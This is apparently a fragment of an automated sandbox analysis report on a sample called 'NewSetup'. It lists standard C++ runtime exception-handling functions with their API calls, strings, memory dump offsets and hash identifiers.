                                                                                                        • Part of subcall function 00228353: IsProcessorFeaturePresent.KERNEL32(00000017,0022378B,?,?,?,?,00000000,?,?,?,0021B5AC,0021B4E0,00000000,?,?,0021B4E0), ref: 0022836F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 1924019822-1018135373
                                                                                                      • Opcode ID: 0a714c19a7ec57c1e2abd20ca2385d55fc8002a7a80a7b5fe7ef910e52feec3a
                                                                                                      • Instruction ID: 4414103db8ab9109e5674e83c194ad14145070d036953b8c8fdd91ab5061b321
                                                                                                      • Opcode Fuzzy Hash: 0a714c19a7ec57c1e2abd20ca2385d55fc8002a7a80a7b5fe7ef910e52feec3a
                                                                                                      • Instruction Fuzzy Hash: B421AF31D20219EBCF26DF95D849AEEB7F9AF64B10F160409E405AB250CB70ADA5CB91
                                                                                                      Function 0021B46C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00212673
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___std_exception_copy
                                                                                                      • String ID: bad array new length$ios_base::badbit set
                                                                                                      • API String ID: 2659868963-1158432155
                                                                                                      • Opcode ID: 56fc2b09f42c4b9dedfc95d2b6154a3d83288ad74eb33f246751c62ecb0c349b
                                                                                                      • Instruction ID: 7f10f873d3f112166a5bf5d80fc9fd7cfc5539585557a0bf292b39ede4b3e46c
                                                                                                      • Opcode Fuzzy Hash: 56fc2b09f42c4b9dedfc95d2b6154a3d83288ad74eb33f246751c62ecb0c349b
                                                                                                      • Instruction Fuzzy Hash: C601D4F1528301ABDB08DF28E855A5A7BE8AF08718F01881CF45D8B341D375E868CB81
                                                                                                      Function 00212610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0021F354,00000000,?,?,?,0021F354,00213D4A,0024759C,00213D4A), ref: 0022066D
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00212673
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                                                      • String ID: bad array new length$ios_base::badbit set
                                                                                                      • API String ID: 3109751735-1158432155
                                                                                                      • Opcode ID: 9239c4bcd6d626e3ed7962430c8bf86f9f701b67dd809284f0e8979666e001a4
                                                                                                      • Instruction ID: dd9911f4d63efadef56f0d0dddefa71053d63c83e6c512b7432ae42028786307
                                                                                                      • Opcode Fuzzy Hash: 9239c4bcd6d626e3ed7962430c8bf86f9f701b67dd809284f0e8979666e001a4
                                                                                                      • Instruction Fuzzy Hash: 33F0F8F1928310ABD704AF29E84974BBBE9EB45718F41881CF5989B301D3B5D468CF92